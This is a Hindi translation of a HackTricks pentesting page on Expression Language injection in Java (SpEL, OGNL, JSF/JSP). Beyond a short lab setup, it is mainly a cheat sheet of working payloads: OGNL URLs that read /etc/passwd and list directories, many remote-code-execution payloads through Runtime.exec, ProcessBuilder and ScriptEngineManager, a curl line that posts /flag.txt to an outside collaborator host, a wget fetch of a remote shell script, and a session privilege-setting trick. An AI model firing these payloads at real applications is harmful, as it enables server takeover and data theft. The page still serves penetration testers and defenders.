EL - Expression Language

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस चाहिए? सब्सक्रिप्शन प्लान्स की जाँच करें!
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
शामिल हों 💬 डिस्कॉर्ड ग्रुप या टेलीग्राम ग्रुप और मुझे ट्विटर 🐦@carlospolopm** का** अनुसरण करें।
हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके hacktricks रेपो और hacktricks-cloud रेपो।

मूल जानकारी

एक्सप्रेशन भाषा (EL) जावा ईई में प्रमुख है जो प्रस्तुति परत (जैसे, वेब पेज) और एप्लिकेशन तर्क (जैसे, प्रबंधित बीन्स) को जोड़ने के लिए है, उनके बीच इंटरेक्शन संभावित करता है। यह प्रमुखतः इस्तेमाल होता है:

जावासर्वर फेसेज (JSF): UI कंपोनेंट्स को बैकएंड डेटा/क्रियाओं से जोड़ने के लिए।
जावासर्वर पेज्स (JSP): JSP पेज्स में डेटा एक्सेस और परिवर्तन के लिए।
कॉन्टेक्स्ट्स और डिपेंडेंसी इंजेक्शन फॉर जावा ईई (CDI): मैनेज्ड बीन्स के साथ वेब परत इंटरेक्शन को सुविधाजनक बनाने के लिए।

उपयोग संदर्भ:

स्प्रिंग फ्रेमवर्क: सुरक्षा और डेटा जैसे विभिन्न मॉड्यूलों में लागू।
सामान्य उपयोग: डेवलपर्स द्वारा जेवीएम-आधारित भाषाओं जैसे जावा, कोटलिन, और स्काला में SpEL एपीआई के माध्यम से।

ईएल जावा ईई प्रौद्योगिकियों, स्थानीय परिवेशों में मौजूद है, और .jsp या .jsf फ़ाइल एक्सटेंशन, स्टैक त्रुटियाँ, और "सर्वलेट" जैसे हेडर्स में शामिल हो सकते हैं। हालांकि, इसकी विशेषताएँ और कुछ विशेष वर्णों का उपयोग संस्करण-विशेष हो सकता है।

ईएल संस्करण के आधार पर कुछ विशेषताएँ चालू या बंद हो सकती हैं और सामान्यत: कुछ वर्ण अनुमति नहीं हो सकते हैं।

मूल उदाहरण

(आप एक और दिलचस्प ट्यूटोरियल ईएल के बारे में https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/ में पा सकते हैं)

Maven रिपॉजिटरी से जार फ़ाइलें डाउनलोड करें:

commons-lang3-3.9.jar
spring-core-5.2.1.RELEASE.jar
commons-logging-1.2.jar
spring-expression-5.2.1.RELEASE.jar

और निम्नलिखित Main.java फ़ाइल बनाएं:

import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;

public class Main {
public static ExpressionParser PARSER;

public static void main(String[] args) throws Exception {
PARSER = new SpelExpressionParser();

System.out.println("Enter a String to evaluate:");
java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
String input = stdin.readLine();
Expression exp = PARSER.parseExpression(input);
String result = exp.getValue().toString();
System.out.println(result);
}
}

अगले कोड को कंपाइल करें (यदि आपके पास javac स्थापित नहीं है, तो sudo apt install default-jdk स्थापित करें):

javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java

एप्लिकेशन को निम्नलिखित के साथ चलाएं:

java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]

नोट करें कि पिछले उदाहरण में शब्द {5*5} मूल्यांकन किया गया था।

CVE आधारित ट्यूटोरियल

इसे इस पोस्ट में जांचें: https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a

पेलोड

मौलिक क्रियाएँ

#Basic string operations examples
{"a".toString()}
[a]

{"dfd".replace("d","x")}
[xfx]

#Access to the String class
{"".getClass()}
[class java.lang.String]

#Access ro the String class bypassing "getClass"
#{""["class"]}

#Access to arbitrary class
{"".getClass().forName("java.util.Date")}
[class java.util.Date]

#List methods of a class
{"".getClass().forName("java.util.Date").getMethods()[0].toString()}
[public boolean java.util.Date.equals(java.lang.Object)]

पता लगाना

बर्प पता लगाना

gk6q${"zkz".toString().replace("k", "x")}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.

J2EE पता लगाना

#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL

दस सेकंड के लिए सों।

#Blind detection vector (sleep during 10 seconds)
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}

रिमोट फ़ाइल समावेश

https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd

निर्देशिका सूची

https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..

RCE

मूल RCE व्याख्या

#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
[public static java.lang.Runtime java.lang.Runtime.getRuntime()]

#Execute command (you won't see the command output in the console)
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
[Process[pid=10892, exitValue=0]]

#Execute command bypassing "getClass"
#{""["class"].forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl <instance>.burpcollaborator.net")}

# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>

RCE लिनक्स

https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt

RCE Windows (जाँच नहीं की गई)

https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt

अधिक RCE

// Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start()

// Method using Runtime via getDeclaredConstructors
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])}
#{session.getAttribute("rtc").setAccessible(true)}
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")}

// Method using processbuilder
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
${request.getAttribute("c").add("cmd.exe")}
${request.getAttribute("c").add("/k")}
${request.getAttribute("c").add("ping x.x.x.x")}
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
${request.getAttribute("a")}

// Method using Reflection & Invoke
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}

// Method using ScriptEngineManager one-liner
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}

// Method using ScriptEngineManager
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");

//https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt
(T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec("cmd "+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+"c "+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(100)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(114)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()))
T(java.lang.System).getenv()[0]
T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')

पर्यावरण की जांच

applicationScope - वैश्विक एप्लिकेशन चरण
requestScope - अनुरोध चरण
initParam - एप्लिकेशन प्रारंभीकरण चरण
sessionScope - सत्र चरण
param.X - पैरामीटर मान जहां X एक http पैरामीटर का नाम है

आपको इन चरणों को स्ट्रिंग में कास्ट करने की आवश्यकता होगी:

${sessionScope.toString()}

अधिकृति छल उदाहरण

${pageContext.request.getSession().setAttribute("admin", true)}

एप्लिकेशन भी कस्टम वेरिएबल्स का उपयोग कर सकता है जैसे:

${user}
${password}
${employee.FirstName}

WAF बायपास

जांच करें https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए? सब्सक्रिप्शन प्लान्स की जांच करें!
खोजें द पीएस फैमिली, हमारा विशेष एनएफटीएस संग्रह
पाएं आधिकारिक PEASS और हैकट्रिक्स स्वैग
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या ट्विटर 🐦@carlospolopm** को** फॉलो करें।
हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो और हैकट्रिक्स-क्लाउड रेपो को PR जमा करके।

PreviousSSTI (Server Side Template Injection)NextJinja2 SSTI

Last updated 3 months ago